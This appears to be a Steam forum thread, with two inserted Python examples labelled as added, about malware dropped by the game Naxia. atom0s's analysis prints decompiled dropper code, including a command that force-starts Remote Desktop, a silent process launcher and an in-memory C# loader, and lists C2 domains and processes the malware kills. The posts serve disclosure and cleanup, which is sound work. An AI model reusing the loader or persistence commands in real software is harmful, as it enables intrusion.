Naxia
This topic has been locked
blackheart2 Aug 9, 2020 @ 12:06am
Virus detected
TL;DR: Naxia appears to have installed a trojan on startup.

FYI, here is an email I sent to Naxia's support:

I purchased your game Naxia from Steam today. When I started it up, Windows Defender immediately* identified a file named 'version.dll' in my $USER\AppData\Local\Temp folder and quarantined it. Windows Defender says this file is a trojan designated

Trojan:Win32/Occamy.C1B

I uploaded it to VirusTotal and VirusTotal confirms that 47 engines detect this as a threat. Here are the details:

https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/details

While I do not know how to confirm that Naxia created this file**, its timestamp does agree with two of the folders in the Naxia folder in SteamApps. In the meantime, I have deleted the file and uninstalled your game.

Are you aware of this issue? Can you confirm that your application creates a file with this name in this directory? I note that this file is a Mono/.NET Assembly and your game uses Unity and [therefore] probably also C#. If this file is one created by your game, do you agree that it is a security threat?

---

* More precisely, a second after the cutscene started.
** I guess I could try to reproduce this in a VM, but I don't have one handy and I am not sure I want to investigate this further.
Originally posted by Infinite8:
With the help of the user "atom0s" we figured out what happened. We used a third-party package called Mesh Effects, which you can find in the Unity Asset Store: https://assetstore.unity.com/packages/vfx/particles/spells/mesh-effects-67803#content. It has a DLL file under its demo resources called ICSharpCode.NRefactory.dll that caused the problem. We removed it from the game, created a ticket for Unity about the issue and told them what is going on with the package. Sorry for the problem, but it is now fixed. Many thanks to atom0s for helping us figure it out. This topic will close next week. You can now update the game and enjoy it.
Showing 16-30 of 39 comments
Aral Aug 15, 2020 @ 11:20pm 
Originally posted by Drannor:
Lol funny I just started wondering about this a few days ago,

after I saw a game I thought looked cool being given out for 'free'.

I almost downloaded it but then remembered hearing about viruses being on games on Steam,

is this some kind of new 'thing' happening nowadays?

Where game devs are starting to see there's more potential in sticking viruses on people's computers to hack their financial accounts than actually making good games to sell?

(I say this after 3 weeks ago I had 2 credit cards defrauded from using this computer I game with).

Hmm.
There is no virus in the game. We are communicating with Unity about the issue, and Steam checks all the content before it gets released. But as we said before, we are working on it.
Aral Aug 16, 2020 @ 10:37am 
Originally posted by blackheart2:
Thank you. I contacted Unity support, and I will reply if I hear back from them.


Originally posted by katta83:
I've got the same problem with version.dll (but also with version.dll/data0001.res and version.dll/data0000.res). The antivirus detected a HEUR:Trojan.Win32.Generic and deleted it. Two days after that the antivirus popped up for a new threat (UDS:DangerousObject.Multi.Generic) on naxia.exe.


Originally posted by ves328:
me as well
Can you please send the name and version of your antivirus?
katta83 Aug 17, 2020 @ 5:50am 
Originally posted by katta83:
I've got the same problem with version.dll (but also with version.dll/data0001.res and version.dll/data0000.res). The antivirus detected a HEUR:Trojan.Win32.Generic and deleted it. Two days after that the antivirus popped up for a new threat (UDS:DangerousObject.Multi.Generic) on naxia.exe.

Hello Aral,
I'm using Kaspersky Anti-Virus 20.0.14.1085.
Regards

Numb-Tung Aug 17, 2020 @ 10:50am 
Hmm, I found this game a few minutes ago after searching for upcoming ARPGs of 2020; now I'm hesitant :steamsad:
Last edited by Numb-Tung; Aug 17, 2020 @ 10:50am
ZeroOps Aug 17, 2020 @ 6:50pm 
To the developers - thank you for looking into this. I am confident that there is no virus and that Steam would immediately remove the game if this were the case. Please keep us all updated on what you find. Also, if you need more info from me (screenshots, etc), please let me know and I will help however I can.
Aral Aug 17, 2020 @ 10:11pm 
Originally posted by katta83:
Originally posted by katta83:
I've got the same problem with version.dll (but also with version.dll/data0001.res and version.dll/data0000.res). The antivirus detected a HEUR:Trojan.Win32.Generic and deleted it. Two days after that the antivirus popped up for a new threat (UDS:DangerousObject.Multi.Generic) on naxia.exe.

Hello Aral,
I'm using Kaspersky Anti-Virus 20.0.14.1085.
Regards


Originally posted by ZeroOpsFG:
To the developers - thank you for looking into this. I am confident that there is no virus and that Steam would immediately remove the game if this were the case. Please keep us all updated on what you find. Also, if you need more info from me (screenshots, etc), please let me know and I will help however I can.


We are trying to help you. With your help, we can definitely solve the problem soon. We shared our problem with Unity and will share it with Kaspersky.
Many thanks to you 💐
Last edited by Aral; Aug 17, 2020 @ 10:12pm
atom0s Aug 18, 2020 @ 6:30pm 
Warning - This Game Is Infected
While the developers are claiming otherwise in the recent topics, this game is infected with a virus. I would avoid this game at all costs currently until this is sorted!

What the game is doing:

Upon launch, the game will extract a DLL called 'version.dll' that it manually loads from memory. This is a fake, renamed threading module which is extracted to:
C:\Users\<yourname>\AppData\Local\Temp\version.dll

This file is not just a standard Version information based library, it attempts to connect to the internet AND it restores the Remote Desktop Service permissions on your system to attempt to allow unwanted access to your system:

std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign( &Dst, "cmd.exe /c \"sc config SessionEnv start= auto&sc start SessionEnv\"", 0x41ui64);

SessionEnv is the Remote Desktop service on Windows. This is attempting to restore the startup type for that service and force-start it.

It then tries to install itself as a .NET Framework sub-module via the .NET registry under the name 'tlpless.dll'. It gets the install paths of your .NET Framework via these keys:
    SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full
    SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v2.0.50727

This DLL also takes ANY command line passed to it and starts it in a silent console window attempting to exploit administrative permissions on your system, if the argument /start is present:

    std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(&lpCommandLine, "cmd.exe /c start /b ", 0x14ui64);
    sub_180002990(&lpCommandLine, &Filename);
    sub_180002990(&lpCommandLine, " /error");
    v7 = (CHAR *)&lpCommandLine;
    if ( v45 >= 0x10 )
        v7 = lpCommandLine;
    CreateProcessA(0i64, v7, 0i64, 0i64, 0, 0, 0i64, 0i64, &StartupInfo, (LPPROCESS_INFORMATION)&StartupInfo.hStdOutput);
    if ( v45 < 0x10 )
        goto LABEL_64;
    v8 = lpCommandLine;

When the tlpless.dll is loaded, it will attempt to check for a valid internet connection via connecting to microsoft.com and google.com. Afterward if valid, it will call a method inside of the tlpless.dll called 'Add':

    signed __int64 __fastcall StartAddress(LPVOID lpThreadParameter)
    {
        HANDLE v1; // rax
        HMODULE v2; // rax
        void (*v4)(void); // rax

        while ( !InternetCheckConnectionA("http://microsoft.com", 1u, 0)
             && !InternetCheckConnectionA("http://google.com", 1u, 0) )
            Sleep(0x7530u);
        Sleep(0x7D0u);
        v1 = OpenThread(0x1FFFFFu, 0, dwThreadId);
        SuspendThread(v1);
        v2 = LoadLibraryA("tlpless.dll");
        if ( !v2 )
            return 1i64;
        v4 = (void (*)(void))GetProcAddress(v2, "Add");
        if ( !v4 )
            return 1i64;
        v4();
        Sleep(0xD4A50FFF);
        Sleep(0xD4A50FFF);
        Sleep(0xD4A50FFF);
        return 0i64;
    }

This will also drop other fake files into your temp folder that mask themselves as .NET related error reporting tools. THESE ARE FAKE. These contain the infected DLLs in their resources.

https://i.imgur.com/AOQCprN.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

https://i.imgur.com/YLcIk7B.png
Scan: https://www.virustotal.com/gui/file/63ec3ef6eb4e0270e3475b3d4d8c1421275b59f533afc5988b3c25fbd3e0e554/detection

https://i.imgur.com/0gRU1zG.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

The embedded DLLs are C# loaders that are used to invoke/load other modules. This is half-packed/protected:
https://i.imgur.com/TFvEEMH.png

This method decrypts a hardcoded infected script to exploit the system further.


DO NOT BUY THIS GAME.
DO NOT TRUST THIS GAME.


It is absolutely infected. I am reporting this to Steam as well.
atom0s Aug 18, 2020 @ 6:55pm 
Infected files created/dropped:
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

Modules to look for on your system:
- libntsc*.dll
- GNU\\scntlib*.dll

While running, this will attempt to kill any process with the following partial name matches:
- askmgr
- rocessha
- rocexp
- ystemexplore
- anvir

It will try to download data/info from:
- "<removed>/jipperskrippersservice.ru/other/new.html"
- "<removed>/margancherforfun.com/other/new.html"
- "<removed>/cellavillibycurtiz.ru/other/new.html"


It will look for the following information:
- MoreStarsMoreSpace
- MoreStarsMoreSpace!

Then attempt to split and decrypt more files to install on your system to continue infection.

These new files are loaded with a base assumed class via:

    // Compiles attacker-supplied C# source in memory and invokes MyNewClass.MyMethod on the result.
    private static string EB(string[] ns, string code)
    {
        CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider();
        CompilerParameters compilerParameters = new CompilerParameters
        {
            GenerateExecutable = false,
            GenerateInMemory = true
        };
        compilerParameters.ReferencedAssemblies.Add("System.dll");
        compilerParameters.ReferencedAssemblies.Add("mscorlib.dll");
        for (int i = 0; i < ns.Length; i++)
        {
            // ns[i] here; the forum's BBCode had swallowed the "[i]" in the original post.
            compilerParameters.ReferencedAssemblies.Add(ns[i]);
        }
        CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(compilerParameters, new string[] { code });
        if (compilerResults.Errors.Count == 0)
        {
            object obj = compilerResults.CompiledAssembly.CreateInstance("MyNewClass");
            if (obj != null)
            {
                return Convert.ToString(obj.GetType().GetMethod("MyMethod").Invoke(obj, null));
            }
        }
        return "dothis";
    }
atom0s Aug 18, 2020 @ 7:10pm 
If you ran this game, and are potentially infected, then do the following. (DO NOT RESTART YOUR PC BEFORE DOING THIS STUFF!)

1. Uninstall the game until this is dealt with, this game is not safe to run.

2. Clear your temp folder entirely.

3. Delete the infected droppers:
- C:/Users/<yourname>/AppData/Local/Temp/version.dll
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

4. Ensure Remote Desktop is disabled on your system:
- See here for more info: https://www.howto-connect.com/enable-disable-remote-desktop-configuration-service-windows-10/

5. Look for any additional instances of 'ntsync.exe' and 'version.dll' you are not familiar with or were created recently when you first/recently launched Naxia. Remove those as well. (Do so with caution, as version.dll can be a legit module for certain applications!)

6. Block all access to the following websites in your hosts file / firewalls:
- jipperskrippersservice [dot] ru
- margancherforfun [dot] com
- cellavillibycurtiz [dot] ru
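Added example (not code from this thread or from atom0s): a small checker for the indicators listed in the two posts above. It hashes every file under a directory and compares the digests with the two SHA-256 values from the VirusTotal links in this thread, flags files named version.dll or ntsync.exe for manual review (version.dll is also a legitimate Windows module, so a name match alone proves nothing), and reports which of the three domains a hosts file does not yet sinkhole. The directory contents and hosts text in the demo are constructed.

```python
"""IoC checker for the indicators quoted in this thread (added example, not from the thread)."""
import hashlib
import os
import tempfile

# SHA-256 values taken from the VirusTotal URLs quoted in the thread.
KNOWN_BAD_SHA256 = {
    "1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311",
    "63ec3ef6eb4e0270e3475b3d4d8c1421275b59f533afc5988b3c25fbd3e0e554",
}
# File names from the dropped-file list; a match means "review", not "delete".
SUSPECT_NAMES = {"version.dll", "ntsync.exe"}
# Domains the dropper contacts, de-obfuscated from the "[dot]" form in the thread.
C2_DOMAINS = (
    "jipperskrippersservice.ru",
    "margancherforfun.com",
    "cellavillibycurtiz.ru",
)


def sha256_file(path, chunk=1 << 20):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_dir(root):
    """Return (path, reason) findings; reason is 'known-hash' or 'suspect-name'."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # locked or unreadable file: skip it, do not abort the sweep
            if digest in KNOWN_BAD_SHA256:
                findings.append((path, "known-hash"))
            elif name.lower() in SUSPECT_NAMES:
                findings.append((path, "suspect-name"))
    return findings


def missing_hosts_entries(hosts_text, domains=C2_DOMAINS):
    """Domains not yet mapped to 0.0.0.0 or 127.0.0.1 in the given hosts file text."""
    blocked = set()
    for line in hosts_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0] in ("0.0.0.0", "127.0.0.1"):
            blocked.update(p.lower() for p in parts[1:])
    return [d for d in domains if d not in blocked]


def hosts_block_lines(domains):
    """Lines to append to the hosts file for the domains still unblocked."""
    return ["0.0.0.0 " + d for d in domains]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed sample: a stand-in named like the dropper plus a benign file.
        with open(os.path.join(tmp, "version.dll"), "wb") as f:
            f.write(b"placeholder, not the real sample")
        with open(os.path.join(tmp, "notes.txt"), "wb") as f:
            f.write(b"benign")
        for path, reason in scan_dir(tmp):
            print(f"{reason:13s} {path}")
    # Constructed hosts file with one of the three domains already sinkholed.
    sample_hosts = "127.0.0.1 localhost\n0.0.0.0 margancherforfun.com\n"
    for line in hosts_block_lines(missing_hosts_entries(sample_hosts)):
        print("add to hosts:", line)
```

On a real Windows machine the directories to sweep, per the steps above, are the user's %TEMP% and C:\Windows\Microsoft.NET\Framework; the hosts file lives at C:\Windows\System32\drivers\etc\hosts. A 'known-hash' hit is the only finding this script treats as certain; a 'suspect-name' hit in an unexpected location should be checked against the file's timestamp and publisher before removal.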

Infinite8  [developer] Aug 18, 2020 @ 9:22pm 
Originally posted by atom0s:
If you ran this game, and are potentially infected, then do the following. (DO NOT RESTART YOUR PC BEFORE DOING THIS STUFF!)

1. Uninstall the game until this is dealt with, this game is not safe to run.

2. Clear your temp folder entirely.

3. Delete the infected droppers:
- C:/Users/<yourname>/AppData/Local/Temp/version.dll
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

4. Ensure Remote Desktop is disabled on your system:
- See here for more info: https://www.howto-connect.com/enable-disable-remote-desktop-configuration-service-windows-10/

5. Look for any additional instances of 'ntsync.exe' and 'version.dll' you are not familiar with or were created recently when you first/recently launched Naxia. Remove those as well. (Do so with caution, as version.dll can be a legit module for certain applications!)

6. Block all access to the following websites in your hosts file / firewalls:
- jipperskrippersservice [dot] ru
- margancherforfun [dot] com
- cellavillibycurtiz [dot] ru

Hi, thanks for the report. We shared our problem with Unity and Kaspersky and are investigating it. Because of the current state of the world (COVID-19), their response times to reports will be slower, as they said.
So please wait; we are working on this issue.
Meanwhile, we are trying to build the game on Linux to see what happens. We will share the result with you.
Last edited by Infinite8; Aug 18, 2020 @ 9:28pm
Celendrin Aug 18, 2020 @ 9:27pm 
Hey Atom0s,

I'm looking at a game called "Streets Ablaze",

they're an indie company who put out their game for free recently (they used to charge for it) and I'm a bit paranoid about if it has any kind of virus attached to it,

how exactly does a person do a virus check on something from steam?

I heard someone say they put a game through VirusTotal, but how are you supposed to do that with Steam games?

I'd like to play the game I had it on my wishlist before they made it free, but would just like to make sure there's nothing weird attached to it,

Cool, thanks for any help.
atom0s Aug 18, 2020 @ 11:46pm 
Originally posted by Drannor:
Hey Atom0s,

I'm looking at a game called "Streets Ablaze",

they're an indie company who put out their game for free recently (they used to charge for it) and I'm a bit paranoid about if it has any kind of virus attached to it,

how exactly does a person do a virus check on something from steam?

I heard someone say they put a game through VirusTotal, but how are you supposed to do that with Steam games?

I'd like to play the game I had it on my wishlist before they made it free, but would just like to make sure there's nothing weird attached to it,

Cool, thanks for any help.

In most cases this will never be an issue, and things are generally caught pretty fast. However, not all viruses are the same, and they can be hidden from detection by various means. The infection this game has does just that to hide itself. Steam does not validate developer files beyond basic scans of the raw files, which does not catch everything.

Which means you are left to deal with whatever the devs push publicly. They are normal files from someone else's machine, so if a dev really wanted, they could easily use Steam as a platform to infect others. (I do not think Naxia is infected intentionally.)

If you are unsure, the best approach is to install the game in an isolated environment: either another computer with limited or no network access, or an isolated VM that is locked down. There you can analyze what is happening, what new files are created, what a process does or accesses on the system, etc.

In this case, Naxia is creating the infected version.dll file shortly after launching and playing the initial cutscenes.
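One concrete way to do the "what new files are created" part of the isolated-VM analysis described above, as an added example that is not code from this thread or from atom0s: take a hash baseline of the directories of interest before launching the program under test, take another afterwards, and diff the two. The demo directory and the simulated "run" below are constructed.

```python
"""Baseline-and-diff of a directory tree for sandbox analysis (added example, not from the thread)."""
import hashlib
import os
import tempfile


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> SHA-256 for every readable file under root."""
    state = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                state[os.path.relpath(full, root)] = sha256_file(full)
            except OSError:
                continue  # file vanished or is locked; not part of the baseline
    return state


def diff_snapshots(before, after):
    """Return sorted lists (created, modified, deleted) of relative paths."""
    created = sorted(p for p in after if p not in before)
    deleted = sorted(p for p in before if p not in after)
    modified = sorted(p for p in after if p in before and before[p] != after[p])
    return created, modified, deleted


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed baseline: one config file already present.
        with open(os.path.join(tmp, "settings.ini"), "w") as f:
            f.write("a=1\n")
        before = snapshot(tmp)

        # Simulated program run: drops a new file and rewrites the config.
        with open(os.path.join(tmp, "version.dll"), "wb") as f:
            f.write(b"constructed stand-in, not a real sample")
        with open(os.path.join(tmp, "settings.ini"), "w") as f:
            f.write("a=2\n")

        created, modified, deleted = diff_snapshots(before, snapshot(tmp))
        print("created: ", created)
        print("modified:", modified)
        print("deleted: ", deleted)
```

For the case in this thread the directories to baseline would be the user's %TEMP% and C:\Windows\Microsoft.NET\Framework, with the second snapshot taken after the cutscene has run, since that is when the drop is reported to happen. Anything listed under "created" can then be hashed and submitted to VirusTotal, as the original poster did.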
Celendrin Aug 19, 2020 @ 12:22am 
Well, anyway, all I can say is: if Steam games are carrying this kind of stuff, imagine what's gonna happen when people start using brain-chips..

( sigh what a world we live in lol..)

Infinite8  [developer] Aug 19, 2020 @ 1:32am 
Hi, thanks for your report, we are working on it.
Infinite8  [developer] Aug 20, 2020 @ 6:59am 
Hi, it seems we fixed the issue.
Please update the game then tell us the result. thanks for your cooperation.